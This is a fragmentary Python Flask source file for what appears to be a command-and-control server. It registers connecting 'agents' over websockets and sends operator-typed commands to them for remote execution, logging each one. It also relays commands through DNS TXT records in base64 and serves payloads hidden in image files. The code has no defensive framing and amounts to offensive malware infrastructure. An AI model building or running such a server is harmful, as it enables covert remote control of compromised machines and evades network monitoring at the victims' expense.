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flask import Flask, request, send_file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flask_sockets import Sockets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base64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threading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dns.resolver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sockets = Sockets(app)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C2_LOGS = "c2_logs.txt"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CONNECTED_AGENTS = {}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log_command(command):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with open(C2_LOGS, "a") as log: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log.write(command + "\n")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@sockets.route('/ws')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handle_ws(ws):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agent_id = ws.receive()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CONNECTED_AGENTS[agent_id] = ws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print(f"[+] Agent Connected: {agent_id}")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while not ws.closed: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command = input("C2&gt; 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 command == "list":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print(CONNECTED_AGENTS.keys())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elif command.startswith("exec"):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_, agent, cmd = command.split(" ", 2)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if agent in CONNECTED_AGENTS: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CONNECTED_AGENTS[agent].send(json.dumps({"cmd": cmd}))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log_command(f"{agent}: {cmd}")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elif command == "exit":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ws.close()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@app.route('/dns_c2/&lt;query&gt;')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dns_c2(query):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Encodes C2 commands inside DNS TXT record responses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command = get_command_from_dns(query)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return base64.b64encode(command.encode()).decode()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 get_command_from_dns(query):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# Example of reading commands via DNS queries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response = dns.resolver.resolve(query, "TXT")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return response[0].to_text().strip('"')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"sleep"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@app.route('/stego/&lt;img_name&gt;')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def stego_payload(img_name):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Delivers payloads hidden in image files.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 send_file(f"stego_payloads/{img_name}", mimetype='image/png')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app.run(host="0.0.0.0", port=5000, threaded=True)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